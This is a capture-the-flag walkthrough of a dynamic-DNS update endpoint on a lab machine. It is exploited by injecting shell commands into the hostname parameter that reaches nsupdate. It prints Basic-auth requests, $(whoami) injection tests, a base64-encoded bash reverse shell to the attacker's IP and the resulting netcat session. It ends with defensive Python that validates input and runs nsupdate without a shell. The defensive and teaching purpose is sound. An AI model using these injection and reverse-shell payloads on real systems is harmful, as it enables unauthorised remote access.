4 nsupdate exploit

Trying to find an exploit for ISC BIND 9.16.1
# nothing found

Looking up the nochg response code we find
https://help.dyn.com/remote-access-api/return-codes/
https://www.noip.com/integrate/response
nochg IP_ADDRESS => Success	IP address is current, no update performed. Followed by a space and the IP address that it is currently set to. The IP address returned will be the IPv4 address if an IPv4 is supplied. If IPv4 and IPv6 are both supplied, both ips will be returned in a comma separated list. If only an IPv6 address is supplied, an IPv6 address (only) will be returned.

# more information on /update
https://www.noip.com/integrate/request

# using Burp to intercept and change request

Changing GET request to
GET /nic/update?hostname=kashz.dyna.htb&myip=10.10.16.161 HTTP/1.1
badauth

# we need to provide credentials
# basic auth is needed via the Authorization header
# new request

Got several 408 Request Timeout errors
debugged: Burp needs two empty lines at the end of the sent request (the blank line that terminates the headers), otherwise it errors

# retrying ...
GET /nic/update?hostname=kashz.dyna.htb&myip=10.10.16.161 HTTP/1.1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
# response
911 [wrngdom: dyna.htb]

# meaning wrong domain, trying a different domain no-ip.htb
GET /nic/update?hostname=kashz.no-ip.htb&myip=10.10.16.161 HTTP/1.1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
# response
good 10.10.16.161

# trying out code injection
GET /nic/update?hostname=id;kashz.no-ip.htb&myip=10.10.16.161 HTTP/1.1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
# response
911 [nsupdate failed]

# spent a lot of time looking for an existing exploit
# came across "nsupdate remote format string exploit" https://www.exploit-db.com/exploits/21440

GET /nic/update?hostname="$(whoami).no-ip.htb&myip=10.10.16.161 
# response
server 127.0.0.1
zone no-ip.htb
update delete www-data.no-ip.htb
good 10.10.16.161

# trying out "$(whoami;id;hostname)"
update delete www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) dynstr.dyna.htb.no-ip.htb

# trying a bash reverse shell one-liner directly in the hostname gives ERROR 400
# maybe base64 it?

# + is used as the URL-encoded space in the query string, so the base64 blob must not contain a +
# the base64 of the command with the usual ports 6969, 1337 etc contains a +, so trying a different port, 999

$ echo -n "/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.161/999 0>&1'" | base64
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE2MS85OTkgMD4mMSc=

# shell success with
GET /nic/update?hostname=";echo+L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE2MS85OTkgMD4mMSc=+|+base64+-d+|+bash;kashz.no-ip.htb&myip=10.10.16.161 HTTP/1.1

$ nc -lvnp 999
listening on [any] 999 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.244] 51780
bash: cannot set terminal process group (795): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dynstr:/var/www/html/nic$ whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
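The root cause on this box is a hostname parameter that reaches nsupdate through a shell. As an added defensive example (not the box's own code), this is how a /nic/update handler should validate hostname and myip and hand the script to nsupdate without a shell; ALLOWED_ZONES, the function names and the 30-second TTL are assumptions.

```python
import ipaddress
import re
import subprocess
from typing import Optional

# Zones this updater may touch (assumed; the notes above only show no-ip.htb)
ALLOWED_ZONES = ("no-ip.htb",)

# One DNS label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
# Characters such as ';', '"' or '$(' fail this check, so they never reach a shell.
LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")

def validate_hostname(hostname: str) -> Optional[str]:
    """Return the normalised hostname if it is a plain FQDN under an allowed zone, else None."""
    host = hostname.strip().rstrip(".").lower()
    if len(host) > 253:
        return None
    for zone in ALLOWED_ZONES:
        suffix = "." + zone
        if host.endswith(suffix):
            labels = host[: -len(suffix)].split(".")
            if labels and all(LABEL_RE.match(label) for label in labels):
                return host
    return None

def build_nsupdate_script(hostname: str, myip: str) -> Optional[str]:
    """Build the nsupdate stdin script for a validated hostname/IPv4 pair, else None."""
    host = validate_hostname(hostname)
    if host is None:
        return None
    try:
        ip = ipaddress.IPv4Address(myip)  # rejects anything that is not a bare IPv4
    except ValueError:
        return None
    zone = next(z for z in ALLOWED_ZONES if host.endswith("." + z))
    return (
        "server 127.0.0.1\n"
        f"zone {zone}\n"
        f"update delete {host}\n"
        f"update add {host} 30 A {ip}\n"
        "send\n"
    )

def run_nsupdate(hostname: str, myip: str) -> bool:
    """Feed the script to nsupdate on stdin as an argv list, never via a shell (assumes nsupdate on PATH)."""
    script = build_nsupdate_script(hostname, myip)
    if script is None:
        return False
    proc = subprocess.run(["nsupdate"], input=script, text=True, capture_output=True)
    return proc.returncode == 0
```

The injected hostnames from the notes above are rejected by validate_hostname before any command is built, while kashz.no-ip.htb passes.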
